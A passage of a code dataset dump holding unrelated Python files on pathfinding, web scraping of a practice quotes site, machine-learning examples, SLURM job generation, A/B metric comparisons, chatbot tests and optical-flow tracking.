explore_j) and new_distance < paths_and_distances[explore_i][explore_j][0]:\n paths_and_distances[explore_i][explore_j][0] = new_distance\n paths_and_distances[explore_i][explore_j][1] = new_path\n heappush(vertices_to_explore, (new_distance, explore_i, explore_j))\n count += 1\n\n return paths_and_distances, count\n\ndef is_out_of_grid(grid, explore_i, explore_j):\n return explore_i < 0 or explore_j < 0 or explore_i >= len(grid) or explore_j >= len(grid[0])\n\ndef is_this_cell_available(grid, grid_copy, explore_i, explore_j):\n return grid[explore_i][explore_j] != \"wall\" and 
grid_copy[explore_i][explore_j] != \"visited\"\n\n\n# using Manhattan Distance since it's a 2D grid and only moves in 4 directions; no diagonal movement\ndef heuristic(explore_i, explore_j, target_i, target_j):\n x_distance = abs(explore_i - target_i)\n y_distance = abs(explore_j - target_j)\n return x_distance + y_distance\n\ndef a_star(grid, start_i, start_j, end_i, end_j):\n grid_copy = [row[:] for row in grid]\n #list that has 3 types of data in it; distance, path and swag\n distances_paths_and_swags = []\n #initialize grid setting all the cells with infinite distance\n for i in range(len(grid)):\n row = []\n for j in range(len(grid[0])):\n row.append([inf, [ \"(\" + str(i) + \",\" + str(j) + \")\"], [\"\"]])\n distances_paths_and_swags.append(row)\n # set the start cell's distance to zero\n distances_paths_and_swags[start_i][start_j][0] = 0\n # set the vertices_to_explore list with the start cell\n vertices_to_explore = [(0, start_i, start_j)]\n count = 0\n # iterate until vertices_to_explore has a vertex to explore and the end cell hasn't been reached yet\n while vertices_to_explore and distances_paths_and_swags[end_i][end_j][0] == inf:\n current_distance, current_i, current_j = heappop(vertices_to_explore)\n grid_copy[current_i][current_j] = \"visited\"\n for direction in directions:\n explore_i, explore_j = new_position_after_move(current_i, current_j, direction)\n\n new_distance = current_distance + 1 + heuristic(explore_i, explore_j, end_i, end_j)\n new_path = distances_paths_and_swags[current_i][current_j][1] + [ \"(\" + str(explore_i) + \",\" + str(explore_j) + \")\" ]\n #if explore_i < 0 or explore_j < 0 or explore_i >= len(grid) or explore_j >= len(grid[0]):\n if is_out_of_grid(grid, explore_i, explore_j):\n continue\n elif is_this_cell_available(grid, grid_copy, explore_i, explore_j) \\\n and new_distance < distances_paths_and_swags[explore_i][explore_j][0]:\n item_in_next_cell = \"\"\n if (grid[explore_i][explore_j] != \"empty\"):\n item_in_next_cell = grid[explore_i][explore_j][0]\n new_swag = distances_paths_and_swags[current_i][current_j][2]\n if item_in_next_cell != \"\":\n new_swag += [\"\" + item_in_next_cell + \"\"]\n if len(new_swag) > 1 and new_swag[0] == \"\":\n new_swag = new_swag[1:]\n\n distances_paths_and_swags[explore_i][explore_j][0] = new_distance\n distances_paths_and_swags[explore_i][explore_j][1] = new_path\n distances_paths_and_swags[explore_i][explore_j][2] = new_swag\n heappush(vertices_to_explore, (new_distance, explore_i, explore_j))\n count += 1\n return distances_paths_and_swags, count\n\n\ndef quicksort( list, start, end):\n # base condition for this recursive function\n if start >= end:\n return\n # select random element to be pivot\n pivot_idx = randrange(start, end + 1)\n pivot_element = list[pivot_idx]\n #print(\"pivot element: {0}\".format(pivot_element))\n # swap random element with last element in sub-list\n list[end], list[pivot_idx] = list[pivot_idx], list[end]\n # tracks all elements which should be to left (lesser than) pivot\n less_than_pointer = start\n for i in range(start, end):\n if list[i] < pivot_element:\n # swap element to the right-most portion of lesser elements\n list[i], list[less_than_pointer] = list[less_than_pointer], list[i]\n # increase lesser element pointer\n less_than_pointer += 1\n # move pivot element to the right-most portion of lesser elements\n list[end], list[less_than_pointer] = list[less_than_pointer], list[end]\n # Call quicksort on the \"left\" and \"right\" sub-lists\n quicksort(list, start, less_than_pointer - 1)\n 
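# A worked example for heuristic() above, kept commented out as a sketch:
# from (0, 0) toward a target at (2, 3),
#
#   heuristic(0, 0, 2, 3) == abs(0 - 2) + abs(0 - 3) == 5
#
# With unit-cost moves in only 4 directions, the Manhattan distance never
# overestimates the true remaining cost, which is what makes it a safe
# heuristic for a_star() on this grid.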
quicksort(list, less_than_pointer + 1, end)\n","sub_path":"codeacademy/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"302777677","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\n\nurl = \"http://quotes.toscrape.com/page/\"\npage_no = 1\nwith open(\"quote_data.csv\",\"w\") as file:\n csv_writer = csv.writer(file)\n csv_writer.writerow([\"QUOTE\",\"AUTHOR\",'author_link'])\n while True:\n response = requests.get(url+str(page_no))\n print(\"Scraping data from:\",url+str(page_no),\"........\")\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n quotes = soup.find_all(class_=\"quote\")\n for quote in quotes:\n q_text = quote.find(class_ = \"text\").get_text() # quote text \n author,author_link = quote.find(class_ = \"author\").get_text(),quote.find('a')['href']\n csv_writer.writerow([q_text,author,\"http://quotes.toscrape.com\"+author_link])\n if soup.find(class_ = 'next') is None:\n break\n page_no += 1\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"web scrapping/webscrapping project/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"133357063","text":"from sklearn.neural_network import MLPClassifier\nfrom sklearn import model_selection\nfrom sklearn.model_selection import train_test_split\n\n\ndef kfold(x, y, max_iters):\n best_accuracy = 0\n best_hidden_layer_size = 0\n\n for hidden_layer_size in range(20, 100, 10):\n print('Running mlp kfold: ', hidden_layer_size, ' / ', 100, end='\r')\n mlp = MLPClassifier(random_state=1, max_iter=max_iters, hidden_layer_sizes=hidden_layer_size)\n kf = model_selection.KFold(n_splits=10)\n accuracy = model_selection.cross_val_score(mlp, x, y, cv=kf)\n if best_accuracy < accuracy.mean():\n best_accuracy = accuracy.mean()\n best_hidden_layer_size = hidden_layer_size\n\n return best_accuracy, best_hidden_layer_size\n\n\ndef train(x_train, y_train, max_iters, hidden_layer_size):\n\n mlp = MLPClassifier(random_state=1,\n max_iter=max_iters,\n hidden_layer_sizes=hidden_layer_size\n )\n # train mlp object using x_train and y_train\n mlp.fit(x_train, y_train)\n return mlp\n\n\ndef predict(x_test, knn):\n # predict using x_test\n y_pred_knn = knn.predict(x_test)\n return y_pred_knn","sub_path":"ml_algorithms/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"63155785","text":"# Train model and make predictions\nimport numpy\nimport pandas\nfrom keras.models import Sequential, model_from_json\nfrom keras.layers import Dense\nfrom keras.utils import np_utils\nfrom sklearn import datasets\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\n\n# fix random seed for reproducibility\nseed = 7\nnumpy.random.seed(seed)\n\n# load dataset\niris = datasets.load_iris()\nX, Y, labels = iris.data, iris.target, iris.target_names\nX = preprocessing.scale(X)\n\n# encode class values as integers\nencoder = LabelEncoder()\nencoder.fit(Y)\nencoded_Y = encoder.transform(Y)\n\n# convert integers to dummy variables (i.e. 
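# A commented-out mini-example of the integer -> one-hot step used above:
# with three classes, np_utils.to_categorical maps each integer label to a
# row of the 3x3 identity matrix, e.g.
#
#   np_utils.to_categorical([0, 2, 1])
#   -> [[1., 0., 0.],
#       [0., 0., 1.],
#       [0., 1., 0.]]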
one hot encoded)\ny = np_utils.to_categorical(encoded_Y)\n\ndef build_model():\n # create model\n model = Sequential()\n model.add(Dense(4, input_dim=4, init='normal', activation='relu'))\n model.add(Dense(3, init='normal', activation='sigmoid'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\ndef save_model(model):\n # saving model\n json_model = model.to_json()\n open('model_architecture.json', 'w').write(json_model)\n # saving weights\n model.save_weights('model_weights.h5', overwrite=True)\n\ndef load_model():\n # loading model\n model = model_from_json(open('model_architecture.json').read())\n model.load_weights('model_weights.h5')\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n return model\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.3, random_state=seed)\n\n# build\nmodel = build_model()\nmodel.fit(X_train, Y_train, nb_epoch=200, batch_size=5, verbose=0)\n\n# save\nsave_model(model)\n\n# load\nmodel = load_model()\n\n# predictions\npredictions = model.predict_classes(X_test, verbose=0)\nprint(predictions)\n# reverse encoding\nfor pred in predictions:\n print(labels[pred])","sub_path":"Iris_Example_Model.py","file_name":"Iris_Example_Model.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"134981307","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom random import sample\n\n\ndef question77RandomEven(start, end):\n if (\n (not isinstance(start, int))\n or\n (not isinstance(end, int))\n ):\n raise ValueError('Function only accepts integer values')\n return sample([x for x in range(start, end)\n if x % 2 == 0\n ], 5)\n\n\nprint(question77RandomEven(100, 201))\n","sub_path":"answers/q77.py","file_name":"q77.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"482432835","text":"##################################################\n# trans_matrix_eqtl_wrapper.py\n#\n# $proj/Scripts/eqtls/trans/gtex/consortium/trans_matrix_eqtl_wrapper.py\n# \n# This version is the most up-to-date version for trans- pipeline.\n#\n# Author: Brian Jo\n#\n##################################################\n\nimport glob\nfrom sys import argv\nimport os.path\nimport os\nimport math\n\nproj_dir = os.environ['proj']\n\n# Examples\n# argv = [str(i) for i in range(9)]\n# argv[1] = '/Data/Expression/gtex/hg19/GTEx_phs000424_v6p/normalized/'\n# argv[2] = '_nonverlapping_certain_autosomes_normalized.txt'\n# argv[3] = '/Output/trans-mapping/gtex/MatrixEQTL/all-by-all-PEER-increments/'\n# argv[4] = '/Output/joblogs/trans-mapping/gtex/MatrixEQTL/all-by-all-PEER-increments/'\n# argv[5] = 'trans_matrix_eqtl_PEER_increments.R'\n# argv[6] = '2.5e8'\n# argv[7] = '20'\n# argv[8] = '40'\n\nin_path = proj_dir + argv[1]\nin_suffix = argv[2]\nout_dir = proj_dir + argv[3]\njoblog_dir = proj_dir + argv[4]\nRscript = argv[5]\ncis_dist = argv[6]\n# Split up each chromosome into how many parts?\nnum_split = argv[7]\n# How many scripts to run in a job?\nscripts_per_run = argv[8]\n\n# Make the job log directories\nif not os.path.exists(joblog_dir):\n os.makedirs(joblog_dir)\n\nmaster_script = proj_dir + '/Scripts/eqtls/trans/gtex/batch/matrix_eqtl_wrapper_' + Rscript + '.sh'\nmaster_handle = open(master_script, 'w')\nmaster_handle.write(\"#!/bin/bash\\n\\n\")\n\nmatrices = glob.glob(in_path + '*' + 
in_suffix)\nprint(len(matrices))\n\nnum_jobs = math.ceil(22 * int(num_split) / int(scripts_per_run))\n\nfor i, matrix in enumerate(matrices):\n filename = matrix.split('/')[-1]\n tissue_name = str.split(filename, in_suffix)[0]\n out_tissue_dir = out_dir + tissue_name + '/'\n if not os.path.exists(out_tissue_dir):\n os.makedirs(out_tissue_dir)\n out_file = out_tissue_dir + filename.replace('.txt','_MatrixEQTL')\n # Iterate through 22*int(num_split) parts - we will have num_jobs jobs that process int(scripts_per_run) parts each. User can further customize this construction.\n for k in range(num_jobs):\n sbatchfile = proj_dir + '/Scripts/eqtls/trans/gtex/batch/matrix_eqtl' + Rscript + '_' + tissue_name + '_part' + str(k+1) + '.slurm'\n job_outfile = 'trans_matrix_eqtl' + Rscript + '_' + tissue_name + '_part' + str(k+1)\n sbatchhandle=open(sbatchfile, 'w')\n cmd=r\"\"\"#!/bin/bash\n#SBATCH -J meqtl_%s_%s # job name\n#SBATCH --mem=24000 # 24 GB requested\n#SBATCH -t 24:00:00 # 24-hour short jobs\n#SBATCH -e %s # err output directory\n#SBATCH -o %s # out output directory\n\numask 002\n\"\"\"%(tissue_name, str(k+1), joblog_dir+job_outfile+'.err', joblog_dir+job_outfile+'.out')\n sbatchhandle.write(cmd)\n for n in range(int(scripts_per_run)):\n j = k*int(scripts_per_run) + n + 1\n cmd_r = r\"\"\"/usr/bin/Rscript %s/Scripts/eqtls/trans/gtex/consortium/%s \\\n%s %s %s %s %s %s %s\n\"\"\"%(proj_dir, Rscript, matrix, str(j), cis_dist, tissue_name, in_path + 'covariates/', out_file, num_split)\n sbatchhandle.write(cmd_r)\n if j == 22 * int(num_split):\n break\n sbatchhandle.close()\n master_handle.write(\"sbatch \" + sbatchfile + \" \\n\")\n\nmaster_handle.close()\n\nprint('sh %s'%(master_script))\n","sub_path":"code_examples/beehive/Scripts/eqtls/trans/gtex/consortium/trans_matrix_eqtl_wrapper.py","file_name":"trans_matrix_eqtl_wrapper.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340407638","text":"# Lint as: python2, python3\n\"\"\"Comparisons for //ads/metrics/lib/meterstick.\"\"\"\n\nfrom __future__ import division\n\nfrom meterstick import pdutils\nimport numpy as np\n\n\nclass Comparison(object):\n \"\"\"Base class for comparisons.\n\n Attributes:\n condition_column: A string denoting the dataframe column to\n compare against (e.g. \"Experiment\").\n baseline_key: A string denoting the value of the\n condition_column which represents the baseline comparison\n condition (e.g., \"Control\").\n factors: A numpy array for the values of condition_column coded as integers\n alternate_keys: The values of factors that are not the baseline\n baseline_index: The integer for the baseline_key in factors\n alternate_indices: The unique values of condition_column ordered by factors\n \"\"\"\n\n # These attributes are public because they have to be accessed by\n # standard error methods.\n\n def __init__(self, condition_column, baseline_key, name,\n include_base=False, sort=True):\n \"\"\"Initializes the Comparison object.\n\n Args:\n condition_column: A string denoting the dataframe column to\n compare against (e.g. 
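# A worked example of the job-splitting arithmetic above, using the sample
# argv values from the header comment (num_split = '20', scripts_per_run = '40'):
# 22 autosomes * 20 parts = 440 parts per tissue, so
#
#   num_jobs = math.ceil(440 / 40) = 11
#
# SLURM jobs per tissue, each running up to 40 Rscript invocations, with the
# break guard ending the last job once j reaches 22 * num_split.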
\"Experiment\").\n baseline_key: A string denoting the value of the\n condition_column which represents the baseline comparison\n condition (e.g., \"Control\").\n name: A string denoting the column name for results of the\n comparison.\n include_base: A boolean for whether the base value should be included in\n the list of indices to compare.\n sort: A boolean for whether the conditions should be sorted.\n \"\"\"\n self.condition_column = condition_column\n self.baseline_key = baseline_key\n self.name = name\n self._include_base = include_base\n self.sort = sort\n\n def compute(self, data_condition, data_baseline, metric):\n \"\"\"Computes the change in metric across condition and baseline.\n\n Every comparison method must implement this method.\n\n Args:\n data_condition: A Pandas DataFrame containing the data for the\n treatment condition.\n data_baseline: A Pandas DataFrame with the data for the\n baseline condition.\n metric: The metric to be compared.\n\n Returns:\n A Pandas Series with the results of the comparison.\n\n Raises:\n NotImplementedError\n \"\"\"\n raise NotImplementedError()\n\n def precalculate(self, data):\n \"\"\"Initializes the factor variable.\n\n Args:\n data: A pandas dataframe.\n\n Raises:\n ValueError: The baseline key isn't found.\n \"\"\"\n conditions = data[self.condition_column].unique()\n if self.sort:\n conditions.sort()\n\n if (conditions != self.baseline_key).all():\n raise ValueError(\"Baseline value {} not present in column {}\".format(\n self.baseline_key, self.condition_column))\n\n self.conditions = [cond for cond in conditions\n if cond != self.baseline_key or self._include_base]\n\n def __call__(self, data, metric):\n \"\"\"Calculates the comparison for the metric on dataframe data.\n\n Args:\n data: A pandas dataframe. It is assumed that the condition column\n and slices are the index of the dataframe, with the condition\n column as the first level. The indexing is handled in core.py.\n metric: A Metric object.\n\n Returns:\n A pandas series with the comparisons of baseline against every other\n unique condition.\n \"\"\"\n results = []\n\n # get dataframe for the baseline\n baseline = pdutils.select_by_label(data, self.baseline_key)\n\n # get dataframe for each of the conditions\n for cond in self.conditions:\n condition = pdutils.select_by_label(data, cond)\n results.append(self.compute(condition, baseline, metric))\n\n if results:\n output = pdutils.concat(results, keys=self.conditions,\n name=self.condition_column)\n else:\n # return dataframe of NaNs with the appropriate number of rows\n output = pdutils.concat(\n [np.nan * self.compute(data, data, metric)] * len(self.conditions),\n keys=self.conditions,\n name=self.condition_column)\n output.name = self.name\n return output\n\n\ndef _make_simple_comparison(fn, name):\n \"\"\"Creates a class for comparison which is a function of the metric values.\n\n Args:\n fn: A function of the metric values.\n name: A string for the column names of the results.\n\n Returns:\n A subclass of Comparison which implements the passed in comparison function.\n \"\"\"\n\n class SimpleComparison(Comparison):\n \"\"\"A comparison which can be represented as a difference between two groups.\n \"\"\"\n\n def __init__(self, condition_column, baseline_key, include_base=False):\n \"\"\"Initializes the comparison.\n\n Args:\n condition_column: A string denoting the dataframe column to\n compare against (e.g. 
\"Experiment\").\n baseline_key: A string denoting the value of the\n condition_column which represents the baseline comparison\n condition (e.g., \"Control\").\n include_base: A boolean for whether the base value should be included in\n the list of indices to compare.\n \"\"\"\n super(SimpleComparison, self).__init__(condition_column, baseline_key,\n name, include_base)\n\n def compute(self, data_condition, data_baseline, metric):\n \"\"\"Calculates the comparison across condition and baseline.\n\n Args:\n data_condition: A pandas dataframe containing a comparison\n condition.\n data_baseline: A pandas dataframe containing the data for the\n baseline condition.\n metric: A Metric object.\n\n Returns:\n A Pandas series with the results of the comparison.\n \"\"\"\n return fn(metric(data_condition), metric(data_baseline))\n\n return SimpleComparison\n\n\ndef _absolute_difference(x, y):\n return x - y\n\n\nAbsoluteDifference = _make_simple_comparison(_absolute_difference,\n \"Absolute Difference\")\n\n\ndef _percentage_difference(x, y):\n return 100 * (x - y) / y\n\n\nPercentageDifference = _make_simple_comparison(_percentage_difference,\n \"Percentage Difference\")\n\n\nclass MH(Comparison):\n \"\"\"Class for Mantel-Haenszel estimator for comparing ratio metrics.\"\"\"\n\n def __init__(self, condition_column, baseline_key, index_var,\n include_base=False):\n \"\"\"Initializes the MH comparison.\n\n Args:\n condition_column: A string denoting the column in the DataFrame that\n contains the conditions (e.g. \"Experiment\").\n baseline_key: A string denoting the name of the condition that\n represents the baseline (e.g., \"Control\"). All conditions will be\n compared to this baseline condition.\n index_var: A string denoting the column in the DataFrame that contains\n the intermediate level of aggregation (e.g. \"AdGroup\").\n include_base: A boolean for whether the baseline condition should be\n included in the output.\n \"\"\"\n super(MH, self).__init__(condition_column, baseline_key,\n \"MH Ratio Percentage Difference\", include_base)\n self.index_var = index_var\n\n def compute(self, data_condition, data_baseline, metric):\n \"\"\"Calculates the MH comparison across condition and baseline.\n\n To get the MH ratio, we have to hack the dataframes. First, metric has to be\n defined by Ratio() so it has numerator and denominator properties. Then we\n calculate MH values and assign it to the numerator column, and set the\n denominator column to constant 1.\n The slices with invalid MH weights are dropped automatically.\n\n Args:\n data_condition: A pandas dataframe containing a comparison condition.\n data_baseline: A pandas dataframe containing the baseline condition.\n metric: A Metric object.\n\n Returns:\n A Pandas series with the results of the comparison.\n\n Raises:\n AttributeError: If metric doesn't have numerator or denominator property.\n RuntimeError: If numerator or denominator column not found in data.\n \"\"\"\n try:\n numer = metric.numerator\n denom = metric.denominator\n except AttributeError:\n raise AttributeError(\n \"Numerator or/and denominator not found for metric %s. 
\"\n \"For MH calculation, pls use Ratio() to define the metric.\" %\n metric.name)\n\n # This assumes split_vars has been set to the data_frame, which is the case\n # if you use Meterstick in the way specified in go/meterstick.\n split_vars = data_condition.index.names\n if split_vars[0] is None:\n grpby_vars = self.index_var\n else:\n grpby_vars = split_vars + [self.index_var]\n data_condition_agg = data_condition.groupby(grpby_vars).sum()\n data_baseline_agg = data_baseline.groupby(grpby_vars).sum()\n data_condition_agg_joined = data_condition_agg.join(\n data_baseline_agg, how=\"inner\",\n rsuffix=\"_other\").reset_index(self.index_var)\n data_baseline_agg_joined = data_baseline_agg.join(\n data_condition_agg, how=\"inner\",\n rsuffix=\"_other\").reset_index(self.index_var)\n denom_other = denom + \"_other\"\n mh_weights = (data_condition_agg_joined[denom] +\n data_condition_agg_joined[denom_other])\n data_condition_agg_joined[numer] *= (data_condition_agg_joined[denom_other]\n / mh_weights)\n data_baseline_agg_joined[numer] *= (data_baseline_agg_joined[denom_other]\n / mh_weights)\n data_condition_agg_joined[denom] = 1\n data_baseline_agg_joined[denom] = 1\n mh_ratio = metric(data_condition_agg_joined) / metric(\n data_baseline_agg_joined)\n return (mh_ratio - 1) * 100\n","sub_path":"comparisons.py","file_name":"comparisons.py","file_ext":"py","file_size_in_byte":9782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491008127","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport os\nimport subprocess\n\nimport psutil\n\n\ndef make_abs(path, base_dir=None):\n base_dir = base_dir or os.getcwd()\n if not os.path.isabs(path):\n return os.path.join(base_dir, path)\n\n return path\n\n\ndef contains_files(d):\n \"\"\"Check if a directory contains any normal files\"\"\"\n for _, _, files in os.walk(d):\n if files:\n return True\n return False\n\n\ndef used_memory():\n return psutil.Process(os.getpid()).memory_info().rss\n\n\ndef available_memory():\n return psutil.virtual_memory().available\n\n\ndef disk_usage(path, human=False):\n \"\"\"disk usage in bytes or human readable format (e.g. 
'2,1GB')\"\"\"\n command = ['du', '-s', path]\n if human:\n command.insert(-1, '-h')\n\n return subprocess.check_output(command).split()[0].decode('utf-8')\n\n\ndef walk(document, transform):\n if not isinstance(document, dict):\n return document\n\n new_doc = dict()\n for key, value in document.items():\n if isinstance(value, dict):\n value = walk(value, transform)\n elif isinstance(value, list):\n value = [walk(v, transform) for v in value]\n\n new_key, new_value = transform(key, value)\n new_doc[new_key] = new_value\n\n return new_doc\n\n\ndef remove_dots(document):\n return walk(document, lambda key, value: (key.replace('.', '-'), value))\n\n\ndef restore_dots(document):\n return walk(document, lambda key, value: (key.replace('-', '.'), value))\n\n\ndef logging_setup(verbosity=1, logfile=None, logger_name=None):\n logger = logging.getLogger(logger_name)\n log_level = (3 - verbosity) * 10\n fmt = '%(asctime)s - %(process)d - %(levelname)s - %(module)s - %(message)s'\n formatter = logging.Formatter(fmt)\n logger.setLevel(log_level)\n logger.propagate = False\n\n if logfile:\n file_handler = logging.FileHandler(logfile)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n else:\n console_handler = logging.StreamHandler()\n console_handler.setLevel(log_level)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n","sub_path":"mit_d3m/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"384503733","text":"import pytest\nfrom rasa_sdk.events import (\n ActionExecuted,\n BotUttered,\n FollowupAction,\n UserUtteranceReverted,\n UserUttered,\n)\n\nfrom covidflow.actions.action_fallback import ActionDefaultFallback\nfrom covidflow.constants import ACTION_LISTEN_NAME, FALLBACK_INTENT\n\nfrom .action_test_helper import ActionTestCase\n\nUSER_TEXT = \"It's home from work we go\"\n\n\ndef latest_events(template_name):\n return [\n BotUttered(\n text=\"Heigh ho, heigh ho\", metadata={\"template_name\": template_name}\n ),\n ActionExecuted(ACTION_LISTEN_NAME),\n UserUttered(USER_TEXT),\n ]\n\n\nclass ActionDefaultFallbackTest(ActionTestCase):\n def setUp(self):\n super().setUp()\n self.action = ActionDefaultFallback()\n\n @pytest.mark.asyncio\n async def test_in_form(self):\n tracker = self.create_tracker(\n active_loop=True, events=latest_events(\"utter_dwarfs_song\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_already_fallback_intent(self):\n tracker = self.create_tracker(\n intent=FALLBACK_INTENT, events=latest_events(\"utter_dwarfs_song\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_already_message_with_variation(self):\n tracker = self.create_tracker(\n intent=FALLBACK_INTENT,\n events=latest_events(\"utter_dwarfs_song__some_variation\"),\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_already_error_message(self):\n tracker = 
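# A commented-out worked example for walk()/remove_dots()/restore_dots() above:
#
#   remove_dots({'a.b': {'c.d': 1}, 'k': [{'x.y': 2}]})
#   -> {'a-b': {'c-d': 1}, 'k': [{'x-y': 2}]}
#
# restore_dots() maps the keys back, but the round trip is lossy for keys
# that legitimately contain '-' (they come back containing '.').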
self.create_tracker(\n intent=FALLBACK_INTENT, events=latest_events(\"utter_dwarfs_song_error\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_other_intent(self):\n tracker = self.create_tracker(\n intent=\"unrelated\", events=latest_events(\"utter_dwarfs_song\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [\n UserUtteranceReverted(),\n ActionExecuted(ACTION_LISTEN_NAME),\n UserUttered(\n USER_TEXT,\n parse_data={\n \"text\": USER_TEXT,\n \"intent\": {\"name\": FALLBACK_INTENT, \"confidence\": 1.0},\n \"intent_ranking\": [\n {\"name\": FALLBACK_INTENT, \"confidence\": 1.0}\n ],\n \"entities\": [],\n },\n ),\n ]\n )\n\n self.assert_templates([])\n","sub_path":"action-server/tests/actions/test_action_fallback.py","file_name":"test_action_fallback.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264361398","text":"'''\nGiven an array and an element, print all indices of an element in an array.\n\nsample input:\n\narr = [1,2,3,4,6,3,4,3]\n\nsample output:\n\nAll indices of element 3 are : 2,5,7\n\nhttps://www.youtube.com/watch?v=bQkwHBaNioE&list=PL-Jc9J83PIiFxaBahjslhBD1LiJAV7nKs&index=24\n\n'''\n\ndef allIndices(arr, idx, fsf, element):\n \n if(idx == len(arr)):\n # return array of length as many times element is present\n return [0] * fsf\n \n if(arr[idx] == element):\n # if element found increment fsf variable and do recursive call\n lst = allIndices(arr, idx+1, fsf+1, element)\n lst[fsf] = idx\n return lst\n else:\n # if element not equal to current element make recursive call without incrementing fsf variable\n lst = allIndices(arr, idx+1, fsf, element)\n return lst\n \nprint(allIndices([1,2,3,4,6,3,4,3], 0, 0, 3))\n \n ","sub_path":"pepcoding/recursion/7_print_all_indices_of_element_in_array_difficult.py","file_name":"7_print_all_indices_of_element_in_array_difficult.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"217170808","text":"import numpy as np\nimport cv2\nimport os\nimport math\n\nclass lkcomponentshsv():\n points = dict()\n video = None\n n_frames = 0\n feature_params = dict( maxCorners = 100,\n qualityLevel = 0.01,\n minDistance = 10,\n blockSize = 3 )\n\n lk_params = dict( winSize = (31,31),\n maxLevel = 5,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\n def __init__(self,video,config):\n self.video = video\n self.feature_params[\"maxCorners\"] = config['lkcomponents']['feature_params_maxCorners']\n self.feature_params[\"qualityLevel\"] = config['lkcomponents']['feature_params_qualityLevel']\n self.feature_params[\"minDistance\"] = config['lkcomponents']['feature_params_minDistance']\n self.feature_params[\"blockSize\"] = config['lkcomponents']['feature_params_blockSize']\n self.lk_params[\"winSize\"] = tuple(config['lkcomponents'][\"lk_params_winSize\"])\n self.lk_params[\"maxLevel\"] = config['lkcomponents'][\"lk_params_maxLevel\"]\n self.lk_params[\"criteria\"] = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT,config['lkflow'][\"lk_params_criteria_EPS\"],config['lkflow'][\"lk_params_criteria_COUNT\"])\n self.lossthreshold = config['lkcomponents']['lossthreshold'] \n\n def start(self):\n self.tracks = []\n self.track_len = 10\n self.detect = 
5\n self.n_frames = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))\n self.width = int(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))\n self.height = int(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n\n ret,first_frame = self.video.read()\n r = cv2.selectROI(first_frame)\n (x,y,dx,dy) = r \n self.box = r\n\n # many templates\n self.p0list = []\n hsv = cv2.cvtColor(first_frame,cv2.COLOR_BGR2HSV)\n self.template_saturation = hsv[:,:,1]\n region = self.template_saturation[y:y+dy,x:x+dx]\n points = cv2.goodFeaturesToTrack(region, **self.feature_params)\n points = np.float32(points + [x,y])\n \n self.p0list = points\n self.p0size = len(self.p0list)\n self.p0flags = np.ones(len(self.p0list))\n self.p0lastgoodI = np.zeros(len(self.p0list))\n\n\n def step(self,step):\n ret, frame = self.video.read()\n if(ret):\n hsv = cv2.cvtColor(frame,cv2.COLOR_RGB2HSV)\n saturation = hsv[:,:,1]\n vis = frame.copy()\n if(len(self.p0list) != 0):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n p1, st1, err = cv2.calcOpticalFlowPyrLK(self.template_saturation, saturation, self.p0list, None, **self.lk_params)\n p0r,st2,error = cv2.calcOpticalFlowPyrLK(saturation,self.template_saturation,p1,None,**self.lk_params)\n d = abs(self.p0list-p0r).reshape(-1,2).max(-1)\n #print(d)\n # 